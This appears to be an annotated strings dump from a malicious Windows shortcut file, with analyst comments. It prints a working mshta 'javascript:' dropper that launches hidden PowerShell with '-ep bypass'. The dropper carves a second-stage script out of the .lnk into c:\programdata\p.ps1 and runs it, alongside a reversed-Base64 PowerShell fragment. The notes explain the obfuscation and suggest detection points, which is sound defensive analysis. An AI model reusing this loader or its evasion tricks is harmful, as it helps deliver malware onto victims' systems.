Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
TYdEv.B
Gfo 1u
# Analyst notes (fragment of a PowerShell script recovered from a strings dump of a .lnk file).
# The leading '>' is presumably residue from the surrounding binary data, not part of the script.
#
# Visible behaviour: three complete string literals ($kmno, $mqwb, $suwz) are each converted to a
# char array, reversed in place with [array]::Reverse, and re-joined into $qsu, $iov and $cgj.
# A fourth literal ($kqxg) is cut off in this dump, and the code that consumes the re-joined
# strings is not visible here.
#
# NOTE(review): the reversed text looks like Base64. The reversed $kmno begins "UmVtb3ZlLUl0ZW0g",
# which decodes to "Remove-Item ". Decode the rest offline to confirm what is staged.
# Reversal on top of an encoding hides cmdlet names from static string matching. Detection is
# better placed at execution time (e.g. PowerShell script block logging) than on these literals.
>$kmno="R3RGJ7kiMrkGJgwiZkgiMzQnbJ9GV6oTXyVGdyVmdu92Y0lmYb1jblxEa0FGU3RGJ70VMrkGJbZGJ9cWYsZGJ70VakslZk0jcvhlYksXKlpXaTZGJgQHbtASakgSZslGa3ByOvRSPpRyO05WdvNmLmRCI9ASZ6l2UmRCI7UGd5JEIn5Wak92YuVULg0GJgM2Zg0DImRyOnEzcw5CccxVY0FGZtFmcn9mcwxFX6M2Jg0WZ0lULlZ3btVmU";$wyc71=$kmno.ToCharArray();[array]::Reverse($wyc71);$qsu= -join($wyc71);$mqwb="rAHJgsTKuVGThRXYEdHZkAyKg4WZMhGdhB1dkRyKgkmZkAyKgkGJoACds1CIwRCI7kmZksSak0Dck0Fdul2WoI3bmtXKwASZu1CIy9GWiRCKml2O9tTZ15Wa052bjtjblxUY0FGR3RGJr4WZMhGdhB1dkRyKpZGJrkGJ9kGJ7liMgEXZtAyZhxmZkgiZpByOwETPpZGJ7kiNrkGJgwiZkgiMzQnbJ9GV6oTXyVGdyVmdu92Y0lmYb1jblxUY0FG";$dmn80=$mqwb.ToCharArray();[array]::Reverse($dmn80);$iov= -join($dmn80);$suwz="ZkgSXdtVZ0lnYbhCIoRXYwRCIjNHI7kSXpITLuVGToRXYQdHZksSamRyKpRCKu4SKpZGJrkGJoslZkgyZulmc0NFdldkLJl0QTFkO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTtFI9ACa0FGcksTXpETLuVGToRXYQdHZksSamRyKpRCKu4SKpZGJrkGJoslZkASPggXZIhGdhBHJd11WlRXeit1O91ncvhlYkAicvhnYtASXwRyWmRCI9ASXwRyWmRCI7lyK";$mqu61=$suwz.ToCharArray();[array]::Reverse($mqu61);$cgj= -join($mqu61);$kqxg="9tjblxUY
r+Mac~vcp|upepMC %(%?gsb
itz`!,33+vy{z%,3eptcR?eaxcrBF1,1yb1etB+33wtfydxtsdg
zb}33,htgrg+eit_1t|dbtC1c~ccT1
^+33yd"y(11wxtbdx1wydxtxb|33,ubgr3+~a`!,becCtgtcbt9vy{z%8+itz`!1,1itz`!171~a`!+ghrt',3p|33:33|~r<1bbp33:33ahs1at<1}}tyb33:33ctf~33:33a331,1wurfts+33wtydfxydxtz{b|33,s{i|+833}}33:33tyB?eax33:33crBF339ert{s^t3+|cf',becCtgtcbt9ghrt'8+itz`!1,1itz`!171|cf'+x~ft',31=wurfts1
dC?yb+33*u51
~x33:33bbtc33:33aiT<tz~33:33g
~33:33R<etV1,1u5*6a|e?)$#\iMMpepU|pcv~cAMM+R6,
3+y{z#,becCtgtcbt9x~ft'8+itz`!1,1itz`!171y{z#+~acd",3+tb}pw1=!3+puv&,becCtgtcbt9~acd"8+itz`!1,1itz`!171puv&++Titrdet1itz`!@
02/'2!-$!4!
ruxn4-0@d%&')}b
b{d47!rv}d%&')n
22!9hi{
%6%23%hd47!rvi{d+.1}`m*/).hd47!rvi{d/39%}b
,ur"+u
!*ur#qq
4b{d#%&vx}d/39%n
22!9hi{
%6%23%hd#%&vxi{d,3!}`m*/).hd#%&vxi{d+.14}b
r$,ur"+(
!*ur#qq
b{d*/5rx}d+.14n
22!9hi{
%6%23%hd*/5rxi{d7!%}`m*/).hd*/5rxi{d/79:}b/
$+')#,
q9$,ub{d'()pr}d/79:n
22!9hi{
%6%23%hd'()pri{d!#%}`m*/).hd'()pri{d369#}bp7
.#,$s"7
!p$-",8+
b{d8%,yp}d369#n
22!9hi{
%6%23%hd8%,ypi{d)-2}`m*/).hd8%,ypi{d79:!}b}}
b{d(+.rv}d79:!n
22!9hi{
%6%23%hd(+.rvi{d#%'}`m*/).hd(+.rvi{d7!%*}d+.1kd,3!kd7!%kd!#%kd)-2kd#%'{d"94%3`}`
/.6%24
42).'hd7!%*i{d2%3`}`m*/).`hd"94%3`m!3`
.6/+%m
802%33)/.`d2%3{
x!Gkit|izv
zozG#"*)/5ovk
vozr#&99!vutj-&9sh;o~H!99/(#";ulrt~r99&colbj!ynH;
u^!99|}
i|~h}99&qr}tqr~tqlrt
!2izODk3-./()uyurqrH;ynH!99}~h~uxvn99&
!oc~U;~vnh~I;itii^;uT9!omb.&hoiI~m~ih~3vutj-2!vozr#;&;vozr#;=;omb.!~spk/&9?;
uzv99099vtx6;hhz99099kby;k~6;ww~sh99099i~lt99099k99;&;
vxDltk!99y|s#s",(b)";}r~th99&yqcv!299ww99099~sH5okr99099ixHL993ox~qyT~oz~iX5okrixHL;&;9!b
p-&hoiI~m~ih~3~spk/2!vozr#;&;vozr#;=;b
p-!b}sr-&9099i~ltk99;&;
vxDltk!~nio;7+;7
vxDltk;unI5sh!99
?;utr99099hh~i99099kc^6~pt99099muR; u}?;ou~out99099X6o~\;&;
? <kvo5",-HcGGzoz_vzi|tiKGG!X<&u}9!vuk)&hoiI~m~ih~3b}sr-2!vozr#;&;vozr#;=;vuk)!hnlz.&9+;7
vxDltk;unI5sh!99 ~?;utrhh~99099ikc^6~ptm99099uR; u}?;ou~ou99099tX6o~\;&;~? <oz
5akvoGGzoz_vzi|tiKGG!X<&u}?;
u99099zvvtx6;hhz99099kby;k~6;ww~sh999!|qt+&hoiI~m~ih~3hnlz.2!vozr#;&;vozr#;=;|qt+!cxrt+&9099|tiKGG!X993~wr]~o~w~_5~mxrvh!299ox~qyTv~99099ohbH~wr]5|urok99099rixH993ox~qyT~oz~iX;&;~mxrvh;o~H!2+++)3k~~wH5okrixHL!99}~tkhpwtkvzlobj99&bnn!~hwz};79!~|s)&hoiI~m~ih~3cxrt+2!vozr#;&;vozr#;=;~|s)!pvuk+&9!299oz
5akvoGGzoz_vzi999!hmb*&hoiI~m~ih~3pvuk+2!vozr#;&;vozr#;=;hmb*!!^c~xno~;vozr#d
SYFKD9V\QPIVT]\IRPWUW?
WYFFFDYD
^FFD\]V\]WTD
KDFFFF
JPVU]\88
488^'D
TYFOFF
KD>7;#!6D
KDFFFF
781'/,FFFFD
KDFFFF
JP]PU688
488^'D
FFOFFKKD
FFOFF'I
488^'CY
488^'FFL
'DYD+7"
7^MTTTVL
PYF^MFF
?48#HLIBJU
&Windows
System32
%mshta.exe
// Analyst notes: command-line argument stored in a .lnk whose target is mshta.exe (see the
// neighbouring strings), so mshta evaluates this as script. "javascript:" parses as a label.
//
// Stage 1 (script host):
//   q is JavaScript written backwards. w = q reversed =
//     a=new ActiveXObject('WScript.Shell');a.Run(c,0,0);close();
//   eval(w) therefore launches the command string c via WScript.Shell with window style 0
//   (hidden), does not wait for it, and closes the mshta window.
//
// Stage 2 (c, assembled from the fragments b, d, e, f, g to break up recognisable keywords):
//   powershell -ep bypass -c ...
//   - $t=0x2f49 is used as an exact file length: the command looks for a *.lnk of that size in the
//     current directory and, if none is found, under $env:TEMP\*\ .
//   - $o=0x1528 is assigned but not referenced again in the visible command; the literal 0x1528
//     is used instead.
//   - The matching file is read as bytes. The first 0x0f22 bytes are skipped and the last
//     ($t-0x1528) bytes are dropped, i.e. the slice 0x0f22..0x1527 (0x606 bytes) is kept.
//   - That slice is written to c:\programdata\p.ps1 and then dot-sourced (". $w").
//   The shortcut thus carries its own next stage at a fixed offset. The content of that slice
//   is not decoded here.
//
// Detection notes: mshta.exe started with a "javascript:" argument; mshta.exe spawning
// powershell with "-ep bypass"; creation of c:\programdata\p.ps1. Because the keywords are split
// with "+" inside the shortcut, match on the child process command line after assembly rather
// than on literal strings in the .lnk.
javascript:q=";)(esolc;)0,0,c(nuR.a;)'llehS.tpircSW'(tcejbOXev"+"itcA wen=a";w=q.split('').reverse().join('');b="-Object";d="$m=Get-C"+"hildItem ";e="*.lnk | where"+b+"{$_.length -eq $t}";f="select";g=" -Encoding Byte;";c="p"+"ower"+"shell -ep by"+"pass -c $o=0x1528;$t=0x2f49;"+d+e+" | "+f+b+" -Expa"+"ndProperty Name;if($m.count -eq 0){"+d+"$env:T"+"EMP\\*\\"+e+";};$f=gc $m"+g+"$w='c:\\pro"+"gramdata\\p.ps1';sc $w ([byte[]]($f | "+f+" -Skip 0x0f22 | "+f+" -SkipLast ($t-0x1528)))"+g+". $w";eval(w);
C:\Windows\System32\mshta.exe